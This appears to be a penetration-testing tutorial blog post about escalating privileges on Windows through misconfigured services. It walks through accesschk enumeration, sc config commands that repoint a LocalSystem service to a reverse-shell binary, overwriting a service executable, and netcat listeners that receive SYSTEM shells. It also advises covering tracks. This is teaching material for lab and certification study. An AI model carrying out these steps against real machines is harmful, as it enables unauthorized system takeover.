There are many ways to take advantage of incorrectly configured services to escalate your privileges on a windows machine.
The types of incorrect configurations I'm going to look at today are the following:
- Insecure Service Properties
- Unquoted Service Paths
- Weak Registry Permissions
- Insecure Service Executables
Since this is a post about privilege escalation it is assumed that you already have access to the target machine as a normal user with basic privileges, and can execute commands either in cmd.exe or Powershell.
A lot of these exploits rely on us somehow replacing the binary file that is run by the service, to our own one. In order to generate our own binary reverse shell file, we can use a tool called
msfvenom which is installed as part of the metasploit framework.
In order to generate a reverse shell to my machine, I run the following command:
This outputs a
reverse.exe file which will attempt to connect back to my machine on
192.168.1.20 on port 4444. I can listen for this using
ncat on my attacking machine.
┌──(gareth㉿enso)-[~/Desktop/Files] └─$ nc -lvnp 4444 Listening on 0.0.0.0 4444
Now that we have our binary file, we need to get it and some tools to help us, onto the target machine somehow.
To aid in the finding of these incorrect configurations it is useful to have some tools on the machine that can help with the enumeration of the system.
Assuming you have a reverse-shell of a user with normal privileges, you may need to "live off the land" and use some existing windows binaries to download your tools.
I like to use
certutil.exe. To download files onto a windows box from the command-line using
certutil.exe you can execute the following:
The previous command will download a bat file called WinPEAS which is short for "Windows Privilege Escalation Awesome Script". This script is great and can be used to automatically find so many avenues open to exploit, including potentially vulnerable service configurations. To find these incorrectly configured services, you can run:
C:\Users\bob\Desktop> .\winPEAS.bat quiet servicesinfo
Accesschk.exe is a windows sysinternals tool that can be used to check your access to various windows resources, such as files, services or directories. While this tool may already live on the machine, in order to run it in command-line only mode, an older version is required.
Insecure Service Properties
Each service on a windows machine has an ACL (Access Control List) which defines certain service-specific permissions. If our user has the following ACL permissions, then we should be able to escalate our privileges.
To check if our user has these permissions, we can use the aforementioned
C:> accesschk.exe /accepteula -uwcqv <username> <svcname> RW <svcname> SERVICE_QUERY_STATUS SERVICE_QUERY_CONFIG SERVICE_CHANGE_CONFIG SERVICE_INTERROGATE SERVICE_ENUMERATE_DEPENDENTS SERVICE_START SERVICE_STOP READ_CONTROL
In this example we can see that we have permission to change the service configuration, stop and start the service. This should be enough to escalate our privileges, assuming the service is running as a privileged account. To check this, we can run the
sc qc <svcname> command.
C:> sc qc daclsvc SERVICE_NAME: daclsvc TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : "C:\Program Files\DACL Service\daclservice.exe" LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : DACL Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem
We can see that this services is running as the LocalSystem account, which is a privileged account.
Because we have the
SERVICE_CHANGE_CONFIG permission, we can simply stop the service, change the binary it will run to point to our reverse-shell, and start it again.
C:\PrivEsc>net stop daclsvc The DACL Service service was stopped successfully. C:\PrivEsc>sc config daclsvc binpath= "\"C:\PrivEsc\reverse.exe\"" [SC] ChangeServiceConfig SUCCESS C:\PrivEsc>net start daclsvc
On my attacking machine, I can see that I now have access to the target machine as a privileged account.
┌──(gareth㉿enso)-[~/Desktop/Files] └─$ nc -lvnp 4444 Listening on 0.0.0.0 4444 Connection received on 192.168.1.203 49939 Microsoft Windows [Version 10.0.17763.1935] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami nt authority\system C:\Windows\system32>
Unquoted Service Paths
This exploit takes advantage of the scenario where the path to the legitimate application has not been enclosed in quotation marks i.e. " characters. For example, if we check the configuration of the following
C:\PrivEsc>sc qc unquotedsvc [SC] QueryServiceConfig SUCCESS SERVICE_NAME: unquotedsvc TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 3 DEMAND_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files\Unquoted Path Service\Common Files\unquotedpathservice.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Unquoted Path Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem
We can see that the
BINARY_PATH_NAME property is not enclosed in quotes.
This is a problem because executable files in Windows can be run without using their extension (e.g.
whoami.exe can be run by just typing
whoami) and some executables take arguments, separated by spaces, e.g.
someprogram.exe arg1 arg2.
This behaviour leads to ambiguity when using absolute paths that are unquoted and contain spaces.
A service with the unquoted path
C:\Program Files\Some Dir\SomeProgram.exe for example could either be:
C:\Program.exe Files\Some Dir\SomeProgram.exe(2 args)
C:\Program Files\Some.exe Dir\SomeProgram.exe(1 arg)
C:\Program Files\Some Dir\SomeProgram.exe(0 args)
We need to ensure that we have the ability to write to one of these folder locations, and that we have the ability to stop and start the service, to take advantage of this scenario.
accesschk to check if we have permission to start/stop the service and write access to a directory in the path:
C:\PrivEsc>.\accesschk.exe /accepteula -ucqv user unquotedsvc R unquotedsvc SERVICE_QUERY_STATUS SERVICE_QUERY_CONFIG SERVICE_INTERROGATE SERVICE_ENUMERATE_DEPENDENTS SERVICE_START SERVICE_STOP READ_CONTROL C:\PrivEsc>.\accesschk.exe /accepteula -uwdq C:\ C:\ Medium Mandatory Level (Default) [No-Write-Up] RW BUILTIN\Administrators RW NT AUTHORITY\SYSTEM C:\PrivEsc>.\accesschk.exe /accepteula -uwdq "C:\Program Files" C:\Program Files Medium Mandatory Level (Default) [No-Write-Up] RW NT SERVICE\TrustedInstaller RW NT AUTHORITY\SYSTEM RW BUILTIN\Administrators C:\PrivEsc>.\accesschk.exe /accepteula -uwdq "C:\Program Files\Unquoted Path Service" C:\Program Files\Unquoted Path Service Medium Mandatory Level (Default) [No-Write-Up] RW BUILTIN\Users RW NT SERVICE\TrustedInstaller RW NT AUTHORITY\SYSTEM RW BUILTIN\Administrators
We see that we have start/stop permissions and that members of the
BUILTIN\Users group have write access to the
Unquoted Path Service directory. This should allow us to take advantage of the aforementioned ambiguity by creating a
Common.exe file in that directory, to trick Windows into running our shell, rather than looking one step down, in the
Common Files directory for an
I'm going to stop the service, copy my
reverse.exe file from earlier into the
Unquoted Path Service directory and rename it to
Common.exe and then start the service again.
I set up a listener on the attacking machine before starting the service.
Weak Registry Permissions
The windows registry stores entries for each service. Since registry entries can have ACLs, if the ACL is incorrectly configured, it may be possible to modify a service's configuration, even if we cannot modify the service directly.
Check the registry entry's access as follows:
C:\PrivEsc>.\accesschk.exe /accepteula -uvwqk HKLM:\System\CurrentControlSet\Services\regsvc HKLM\System\CurrentControlSet\Services\regsvc Medium Mandatory Level (Default) [No-Write-Up] RW NT AUTHORITY\SYSTEM KEY_ALL_ACCESS RW BUILTIN\Administrators KEY_ALL_ACCESS RW NT AUTHORITY\INTERACTIVE KEY_ALL_ACCESS
Since our current user is a member of
NT AUTHORITY\INTERACTIVE we have write permission to this registry entry, for the
We can use this permission to overwrite the ImagePath registry key to point to our own executable. Again we must also have permissions to start/stop the service.
Insecure Service Executables
Sometimes our basic user account has permission to just overwrite the executable that the service is configured to run. In this instance it is a case of stopping the service, copying the legitimate binary to somewhere else, copying our binary in its place, and starting the service again.
Keeping a backup of the original binary is a good idea to help cover our tracks after we are finished exploiting the machine.
C:\PrivEsc>.\accesschk.exe /accepteula -quwv "C:\Program Files\File Permissions Service\filepermservice.exe" C:\Program Files\File Permissions Service\filepermservice.exe Medium Mandatory Level (Default) [No-Write-Up] RW Everyone FILE_ALL_ACCESS RW NT AUTHORITY\SYSTEM FILE_ALL_ACCESS RW BUILTIN\Administrators FILE_ALL_ACCESS RW BUILTIN\Users FILE_ALL_ACCESS C:\PrivEsc>copy "C:\Program Files\File Permissions Service\filepermservice.exe" C:\Temp 1 file(s) copied. C:\PrivEsc>copy /Y C:\PrivEsc\reverse.exe "C:\Program Files\File Permissions Service\filepermservice.exe" 1 file(s) copied. C:\PrivEsc>net start filepermsvc The service is not responding to the control function.
On the attacking machine:
┌──(gareth㉿enso)-[~/Desktop] └─$ nc -lvnp 4444 Listening on 0.0.0.0 4444 Connection received on 192.168.1.203 50073 Microsoft Windows [Version 10.0.17763.1935] (c) 2018 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami nt authority\system C:\Windows\system32>
These are just some ways to gain escalated privileges on an incorrectly configured Windows 10 machine. If you have the ability to stop and start a service, and have some kind of permission to alter or change the service executable in some way, you can usually take advantage and escalate your privileges, either horizontally or vertically.
To learn more about Windows privilege escalation I highly recommend a Udemy course by tib3rius called Windows Privilege Escalation for OSCP and Beyond!